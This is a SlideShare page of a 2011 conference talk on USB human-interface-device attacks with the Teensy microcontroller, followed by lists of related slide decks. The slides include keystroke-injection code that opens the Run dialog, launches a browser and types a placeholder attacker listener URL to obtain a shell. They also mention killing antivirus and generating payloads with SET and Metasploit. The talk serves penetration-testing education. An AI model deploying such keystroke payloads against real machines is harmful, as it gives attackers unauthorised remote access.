SlideShare a Scribd company logo

Teensy Preso

W
Wardell Motley, NSA IAM\IEM

Penetrating through a Teensy Hole Human Interface Device Attack Vectors

1 of 21
|EH (Certified Ethical Hacker) NSA-IAMIEM (NSA Information Assurance Methodology) Other Security Related Stuff: Contributor: The Ethical Hacker. Net Contributor:Hakin9 Magazine Contributor: Penetration Testing Execution Standard Information Security Mentors Project (Mentor)
David Crenshaw Irongeek Darren Kitchen Hak5 Robin Wood David Kennedy (ReLik) SET Toolkit http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke- dongle
 USB-based microcontroller development system  AVR Processor, 16 MHz  Single push button programming  Small Size  Works with Mac OS X, Linux & Windows  Flash Memory 32256
 USB-based microcontroller development system  AVR Processor, 20 MHz  Single push button programming  Small Size  Works with Mac OS X, Linux & Windows  Flash Memory 130048
 Allows for keystroke programming  Not dependent on U3 auto run  Can provide you a shell and kill antivirus faster than you can!  Cheap Economy is bad and you need to spend less! ($16 $24)  Easily Implantable (More on This Later)
Teensy Device Teensy Loader Software Arduino Software Teensy Duino Software Serial Install Mini B USB Cable Computer Your Brain and some good ideas
 Can be programmed in C or Arduino Language http://www.pjrc.com/teensy
 Limited Scope  Limited Attack Vectors  You only get 5 hardened IP addresses  Be Finished by Tomorrow!!!!  Laughing CISO’s “What you not in yet?”
SET + Metasploit Creates PDE File and Listener for you
Auto Generated Code Does things you probably don’t need Do you really want to spend that time swimming through someone else’s code? Don’t be lazy
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now();
Keyboard.set_key1(KEY_BACKSPACE); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.println("iexplore.exe"); Keyboard.set_key1(KEY_ENTER); Keyboard.set_key1(0); delay(5000); Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key2(KEY_D); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.println("http://YourIPAddressForyourlistener goes here");
 Target needs to be logged in!  Limited to the access rights of the logged on user!  Lots of things can and sometimes do go wrong!  If you try to drop shell right away you will be caught
LinkedIn: Wardell Motley Twitter: Infowarrior0 Email:infowarrior0@gmail.com Please Put “BSides DFW 2011 in the Subject Line”
Contact Information: Infowarrior0@gmail.com LinkedIn: Wardell Motley Twitter:Infowarrior0

Recommended

Cracking Into Embedded Devices - Hack in The Box Dubai 2008
Cracking Into Embedded Devices - Hack in The Box Dubai 2008Cracking Into Embedded Devices - Hack in The Box Dubai 2008
Cracking Into Embedded Devices - Hack in The Box Dubai 2008guest642391
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 
Developers are from Mars, Security guys are from Venus
Developers are from Mars, Security guys are from VenusDevelopers are from Mars, Security guys are from Venus
Developers are from Mars, Security guys are from VenusXavier Mertens
 
$HOME Sweet $HOME Devoxx 2015
$HOME Sweet $HOME Devoxx 2015$HOME Sweet $HOME Devoxx 2015
$HOME Sweet $HOME Devoxx 2015Xavier Mertens
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
IoT security
IoT securityIoT security
IoT securityAbhishek Dwivedi
 
Controlling USB Flash Drive Controllers: Expose of Hidden Features
Controlling USB Flash Drive Controllers: Expose of Hidden FeaturesControlling USB Flash Drive Controllers: Expose of Hidden Features
Controlling USB Flash Drive Controllers: Expose of Hidden Featuresxabean
 
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilities
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilitiesDEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilities
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilitiesFelipe Prado
 

Recommended

Cracking Into Embedded Devices - Hack in The Box Dubai 2008
Cracking Into Embedded Devices - Hack in The Box Dubai 2008Cracking Into Embedded Devices - Hack in The Box Dubai 2008
Cracking Into Embedded Devices - Hack in The Box Dubai 2008guest642391
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 
Developers are from Mars, Security guys are from Venus
Developers are from Mars, Security guys are from VenusDevelopers are from Mars, Security guys are from Venus
Developers are from Mars, Security guys are from VenusXavier Mertens
 
$HOME Sweet $HOME Devoxx 2015
$HOME Sweet $HOME Devoxx 2015$HOME Sweet $HOME Devoxx 2015
$HOME Sweet $HOME Devoxx 2015Xavier Mertens
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
IoT security
IoT securityIoT security
IoT securityAbhishek Dwivedi
 
Controlling USB Flash Drive Controllers: Expose of Hidden Features
Controlling USB Flash Drive Controllers: Expose of Hidden FeaturesControlling USB Flash Drive Controllers: Expose of Hidden Features
Controlling USB Flash Drive Controllers: Expose of Hidden Featuresxabean
 
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilities
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilitiesDEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilities
DEFCON 23 - Mickey Shkatov Jesse Michael - scared poopless lte vulnerabilitiesFelipe Prado
 
$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE Edition$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE EditionXavier Mertens
 
Javantura - Securing the JVM
Javantura - Securing the JVMJavantura - Securing the JVM
Javantura - Securing the JVMNicolas Fränkel
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
Malware Analysis Using Free Software
Malware Analysis Using Free SoftwareMalware Analysis Using Free Software
Malware Analysis Using Free SoftwareXavier Mertens
 
Hacker tool talk: kismet
Hacker tool talk: kismetHacker tool talk: kismet
Hacker tool talk: kismetChris Hammond-Thrasher
 
Windows IoT
Windows IoTWindows IoT
Windows IoTSameer Sapra
 
Free Libre Open Source Software Development
Free Libre Open Source Software DevelopmentFree Libre Open Source Software Development
Free Libre Open Source Software DevelopmentFrederik Questier
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
List of Software tools for encryption
List of Software tools for encryptionList of Software tools for encryption
List of Software tools for encryptionCliford John Reandino
 
Windows 10 IoT Core
Windows 10 IoT CoreWindows 10 IoT Core
Windows 10 IoT CoreCanada's Technology Triangle .NET User Group
 
Security Issues in Android Custom ROM
Security Issues in Android Custom ROMSecurity Issues in Android Custom ROM
Security Issues in Android Custom ROMAnant Shrivastava
 
Stealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayStealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayn|u - The Open Security Community
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devicesYashin Mehaboobe
 
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...Nicolas Fränkel
 
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...Nicolas Fränkel
 
ESET SMART SECURITY 8
ESET SMART SECURITY 8ESET SMART SECURITY 8
ESET SMART SECURITY 8FREEWRINKLECREAM
 
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand..."Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...eLiberatica
 
Os Comparison
Os ComparisonOs Comparison
Os ComparisonUnited Bank Limited
 
Embedded linux build systems
Embedded linux build systems Embedded linux build systems
Embedded linux build systems Mender.io
 
Hakin9 05 2013
Hakin9 05 2013Hakin9 05 2013
Hakin9 05 2013Rodrigo Gomes Pires
 
Safe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devicesSafe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devicesSoumitra Bhattacharyya
 

More Related Content

What's hot

$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE Edition$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE EditionXavier Mertens
 
Javantura - Securing the JVM
Javantura - Securing the JVMJavantura - Securing the JVM
Javantura - Securing the JVMNicolas Fränkel
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
Malware Analysis Using Free Software
Malware Analysis Using Free SoftwareMalware Analysis Using Free Software
Malware Analysis Using Free SoftwareXavier Mertens
 
Free Libre Open Source Software Development
Free Libre Open Source Software DevelopmentFree Libre Open Source Software Development
Free Libre Open Source Software DevelopmentFrederik Questier
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
List of Software tools for encryption
List of Software tools for encryptionList of Software tools for encryption
List of Software tools for encryptionCliford John Reandino
 
Security Issues in Android Custom ROM
Security Issues in Android Custom ROMSecurity Issues in Android Custom ROM
Security Issues in Android Custom ROMAnant Shrivastava
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devicesYashin Mehaboobe
 
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...Nicolas Fränkel
 
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...Nicolas Fränkel
 
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand..."Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...eLiberatica
 
Embedded linux build systems
Embedded linux build systems Embedded linux build systems
Embedded linux build systems Mender.io
 

What's hot (20)

$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE Edition$HOME Sweet $HOME SANSFIRE Edition
$HOME Sweet $HOME SANSFIRE Edition
 
Javantura - Securing the JVM
Javantura - Securing the JVMJavantura - Securing the JVM
Javantura - Securing the JVM
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionage
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
Malware Analysis Using Free Software
Malware Analysis Using Free SoftwareMalware Analysis Using Free Software
Malware Analysis Using Free Software
 
Hacker tool talk: kismet
Hacker tool talk: kismetHacker tool talk: kismet
Hacker tool talk: kismet
 
Windows IoT
Windows IoTWindows IoT
Windows IoT
 
Free Libre Open Source Software Development
Free Libre Open Source Software DevelopmentFree Libre Open Source Software Development
Free Libre Open Source Software Development
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
List of Software tools for encryption
List of Software tools for encryptionList of Software tools for encryption
List of Software tools for encryption
 
Windows 10 IoT Core
Windows 10 IoT CoreWindows 10 IoT Core
Windows 10 IoT Core
 
Security Issues in Android Custom ROM
Security Issues in Android Custom ROMSecurity Issues in Android Custom ROM
Security Issues in Android Custom ROM
 
Stealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayStealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker way
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
 
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
Code Europe PL - Securing the JVM: Neither for fun nor for profit, but do you...
 
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
Voxxed Days Athens - Securing the JVM - Neither for fun nor for profit, but d...
 
ESET SMART SECURITY 8
ESET SMART SECURITY 8ESET SMART SECURITY 8
ESET SMART SECURITY 8
 
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand..."Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
"Viruses Exploits Rootkits the Dilemma of a Linux Product Manager" by Alexand...
 
Os Comparison
Os ComparisonOs Comparison
Os Comparison
 
Embedded linux build systems
Embedded linux build systems Embedded linux build systems
Embedded linux build systems
 

Similar to Teensy Preso

Safe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devicesSafe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devicesSoumitra Bhattacharyya
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Hacking the future with USB HID
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HIDNikhil Mittal
 
Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?msyukor
 
Taller IoT en la Actualidad
Taller IoT en la ActualidadTaller IoT en la Actualidad
Taller IoT en la ActualidadLaurence HR
 
PICDriverResearch
PICDriverResearchPICDriverResearch
PICDriverResearchJohn Dunbar
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primeramiable_indian
 
2.2. Introduction to Arduino
2.2. Introduction to Arduino2.2. Introduction to Arduino
2.2. Introduction to Arduinodefconmoscow
 
Io t slides_iotvillage
Io t slides_iotvillageIo t slides_iotvillage
Io t slides_iotvillageagmoneyy
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
 
Taking the hard out of hardware
Taking the hard out of hardwareTaking the hard out of hardware
Taking the hard out of hardwareRonald McCollam
 
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들GangSeok Lee
 
2nd ARM Developer Day - mbed Workshop - ARM
2nd ARM Developer Day - mbed Workshop - ARM2nd ARM Developer Day - mbed Workshop - ARM
2nd ARM Developer Day - mbed Workshop - ARMAntonio Mondragon
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 

Similar to Teensy Preso (20)

Hakin9 05 2013
Hakin9 05 2013Hakin9 05 2013
Hakin9 05 2013
 
Safe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devicesSafe and secure programming practices for embedded devices
Safe and secure programming practices for embedded devices
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detection
 
Hacking the future with USB HID
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HID
 
Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?
 
Taller IoT en la Actualidad
Taller IoT en la ActualidadTaller IoT en la Actualidad
Taller IoT en la Actualidad
 
PICDriverResearch
PICDriverResearchPICDriverResearch
PICDriverResearch
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
 
Backtrack
BacktrackBacktrack
Backtrack
 
2.2. Introduction to Arduino
2.2. Introduction to Arduino2.2. Introduction to Arduino
2.2. Introduction to Arduino
 
Io t slides_iotvillage
Io t slides_iotvillageIo t slides_iotvillage
Io t slides_iotvillage
 
Kali net hunter
Kali net hunterKali net hunter
Kali net hunter
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
EvilDuino
EvilDuinoEvilDuino
EvilDuino
 
Taking the hard out of hardware
Taking the hard out of hardwareTaking the hard out of hardware
Taking the hard out of hardware
 
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
[2010 CodeEngn Conference 04] window31 - Art of Keylogging 키보드보안과 관계없는 키로거들
 
2nd ARM Developer Day - mbed Workshop - ARM
2nd ARM Developer Day - mbed Workshop - ARM2nd ARM Developer Day - mbed Workshop - ARM
2nd ARM Developer Day - mbed Workshop - ARM
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 

Teensy Preso